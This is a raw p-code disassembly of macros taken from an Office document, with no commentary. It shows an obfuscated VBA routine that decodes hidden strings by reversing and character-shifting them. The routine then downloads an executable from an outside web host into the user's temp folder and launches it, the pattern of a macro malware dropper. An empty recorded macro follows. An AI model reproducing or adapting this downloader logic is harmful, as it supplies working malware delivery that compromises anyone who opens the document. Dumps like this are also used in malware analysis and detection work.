' 	FnLen 
' 	For 
' Line #14:
' 	Ld ÜÂíËàéíééñàîÏÑáÀÑùùüÉüËÏèÏÉñçàÈÑûëèûéÔÀèùóéïôÑôÂËûÔèèéëáóÜÉóñâèêàÉúáûÛâÇÛçûïÔëééîÀÏêÊèÎÔÇÔêâÂçÊëÂÊÇéàôÇÈáéÛËÎîûíÉéôëëêïÛéïË 
' 	Ld íéÎÇÀÎÜëÏÀËàÜÈÊèÊÏúÎëÀÀûÇÑàêñÛÛôûÂïñàÑËîïéîùËÉêÇÜÜÇÏÉÂóÀüêéëÂôÏùñÇáñéÑîÊáéÉùîúüÈÎÔéÑÉÂÇÂÉëûÈúùôÎÂÈôóûÜÑÊùíÊûÏüÉÈîîóÜêíçéêÉñ 
' 	LitDI2 0x0001 
' 	ArgsLd Mid 0x0003 
' 	St îËËÛàëáôüèóÑïÂîüññíúÊÀÊéÏûáíóÏéáïÔÉáâÉéÜèúúËôúïÉóÂñÈËâúóáàÔÀúôÀùÊÎÑôùÉíÎêÈüîÎÈïÑâçâèüíüÇéáÛâéÜÂíËïÜÔûÑÛïÇÉéÉÏèËÊçíâóÉûÉçÔùï 
' Line #15:
' 	Ld ÉÇûéÏçñÔçÛîËËÛàëáôüèóÑïÂîüññíúÊÀÊéÏûáíóÏéáïÔÉáâÉéÜèúúËôúïÉóÂñÈËâúóáàÔÀúôÀùÊÎÑôùÉíÎêÈüîÎÈïÑâçâèüíüÇéáÛâéÜÂíËïÜÔûÑÛïÇÉéÉÏèËÊç 
' 	Ld îËËÛàëáôüèóÑïÂîüññíúÊÀÊéÏûáíóÏéáïÔÉáâÉéÜèúúËôúïÉóÂñÈËâúóáàÔÀúôÀùÊÎÑôùÉíÎêÈüîÎÈïÑâçâèüíüÇéáÛâéÜÂíËïÜÔûÑÛïÇÉéÉÏèËÊçíâóÉûÉçÔùï 
' 	ArgsLd Asc 0x0001 
' 	LitDI2 0x0001 
' 	Sub 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	St ÉÇûéÏçñÔçÛîËËÛàëáôüèóÑïÂîüññíúÊÀÊéÏûáíóÏéáïÔÉáâÉéÜèúúËôúïÉóÂñÈËâúóáàÔÀúôÀùÊÎÑôùÉíÎêÈüîÎÈïÑâçâèüíüÇéáÛâéÜÂíËïÜÔûÑÛïÇÉéÉÏèËÊç 
' Line #16:
' 	StartForVariable 
' 	Next 
' Line #17:
' 	Ld ÉÇûéÏçñÔçÛîËËÛàëáôüèóÑïÂîüññíúÊÀÊéÏûáíóÏéáïÔÉáâÉéÜèúúËôúïÉóÂñÈËâúóáàÔÀúôÀùÊÎÑôùÉíÎêÈüîÎÈïÑâçâèüíüÇéáÛâéÜÂíËïÜÔûÑÛïÇÉéÉÏèËÊç 
' 	St ÇÀèËûëÇáùùçúùñÛïÜïÛâËùôêÉÈÑùúÑüâéÂúüàëééÛûíéÛóÀËËÊáûîûÜëêÈËÏÇÜîçóÂÈÉÂÉóÔÀÏÀéáçâÎîËôÀÉÀÎÈüóëÏéÔÉéÇíèÑ 
' Line #18:
' 	EndFunc 
' Line #19:
' 	FuncDefn (Sub âçâèüíüÇéáÛâéÜÂíËïÜÔûÑÛïÇÉéÉÏèËÊçíâóÉûÉçÔùïíéÎÇÀÎÜëÏÀËàÜÈÊèÊÏúÎëÀÀûÇÑàêñÛÛôûÂïñàÑËîïéîùËÉêÇÜÜÇÏÉÂóÀüêéëÂôÏùñÇáñéÑîÊáéÉùîúüÈ())
' Line #20:
' 	LitDI2 0x0000 
' 	LitStr 0x0032 "fyf/nmn0fwjidsb.qx0ufo/fojhoffnpdojufosfuoj00;quui"
' 	ArgsLd ÇÀèËûëÇáùùçúùñÛïÜïÛâËùôêÉÈÑùúÑüâéÂúüàëééÛûíéÛóÀËËÊáûîûÜëêÈËÏÇÜîçóÂÈÉÂÉóÔÀÏÀéáçâÎîËôÀÉÀÎÈüóëÏéÔÉéÇíèÑ 0x0001 
' 	LitStr 0x0004 "temp"
' 	ArgsLd Environ 0x0001 
' 	LitStr 0x000D "fyf/uofjmDUpX"
' 	ArgsLd ÇÀèËûëÇáùùçúùñÛïÜïÛâËùôêÉÈÑùúÑüâéÂúüàëééÛûíéÛóÀËËÊáûîûÜëêÈËÏÇÜîçóÂÈÉÂÉóÔÀÏÀéáçâÎîËôÀÉÀÎÈüóëÏéÔÉéÇíèÑ 0x0001 
' 	Concat 
' 	LitDI2 0x0000 
' 	LitDI2 0x0000 
' 	ArgsCall ñÈËâúóáàÔÀúôÀùÊÎÑôùÉíÎêÈüîÎÈïÑâçâèüíüÇéáÛâéÜÂíËïÜÔûÑÛïÇÉéÉÏèËÊçíâóÉûÉçÔùïíéÎÇÀÎÜëÏÀËàÜÈÊèÊÏúÎëÀÀûÇÑàêñÛÛôûÂïñàÑËîïéîùËÉêÇÜÜ 0x0005 
' Line #21:
' 	LitDI2 0x0000 
' 	LitStr 0x0004 "open"
' 	LitStr 0x0003 "tmp"
' 	ArgsLd Environ$ 0x0001 
' 	LitStr 0x000D "fyf/uofjmDUpX"
' 	ArgsLd ÇÀèËûëÇáùùçúùñÛïÜïÛâËùôêÉÈÑùúÑüâéÂúüàëééÛûíéÛóÀËËÊáûîûÜëêÈËÏÇÜîçóÂÈÉÂÉóÔÀÏÀéáçâÎîËôÀÉÀÎÈüóëÏéÔÉéÇíèÑ 0x0001 
' 	Concat 
' 	LitStr 0x0000 ""
' 	Ld vbNullString 
' 	Ld vbNormalFocus 
' 	ArgsCall _B_var_ÜÜîàçÜÂÔËÉêÔûêÛïÇééÉÉÀËúùíùóéûèçÔùïéÀÎéÏüêëÎÏúïÑÈóÂÊÑâüÇûÀûÇèàèñïÔôûÂîíôÉËÈïáÈôËóÇÂêÜÇÉéÀàûçêáÇÀïÏËàÇÑàÜêîÉÜÔèùîóçÇüëéÑÉééá 0x0006 
' Line #22:
' 	EndSub 
' Macros/VBA/NewMacros - 1062 bytes
' Line #0:
' 	FuncDefn (Sub dfghj())
' Line #1:
' 	QuoteRem 0x0000 0x0000 ""
' Line #2:
' 	QuoteRem 0x0000 0x000C " dfghj Macro"
' Line #3:
' 	QuoteRem 0x0000 0x0000 ""
' Line #4:
' 	QuoteRem 0x0000 0x0000 ""
' Line #5:
' Line #6:
' 	EndSub